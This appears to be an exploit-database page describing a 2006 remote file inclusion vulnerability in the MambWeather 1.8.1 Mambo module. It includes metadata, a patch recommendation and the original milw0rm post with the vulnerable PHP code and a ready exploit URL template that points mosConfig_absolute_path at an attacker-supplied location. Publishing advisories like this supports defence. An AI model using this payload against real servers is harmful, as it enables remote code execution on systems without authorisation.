header-logo
Suggest Exploit
vendor:
MambWeather
by:
h4ntu
9,3
CVSS
HIGH
Remote Inclusion Vulnerability
94
CWE
Product Name: MambWeather
Affected Version From: 1.8.1
Affected Version To: 1.8.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:mamboforge:mambweather
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Another Mambo Module Remote Inclusion Vulnerability

A remote inclusion vulnerability was found in the MambWeather module, specifically in the file MambWeather/Savant2/Savant2_Plugin_options.php. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server, containing a malicious URL in the mosConfig_absolute_path parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the MambWeather module.
Source

Exploit-DB raw data:

Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo module remote inclusion vulneribility

download : http://mamboxchange.com/frs/download.php/1498/MambWeather181.zip
 
bug found in file : MambWeather/Savant2/Savant2_Plugin_options.php
 
 <?php

 /**
 * Base plugin class.
 */
 global $mosConfig_absolute_path;

 require_once $mosConfig_absolute_path.'/modules/MambWeather/Savant2/Plugin.php';

 /**

exploit:

http://[site]/[path_to_mambo]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker ]

Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker@dalnet

# milw0rm.com [2006-10-22]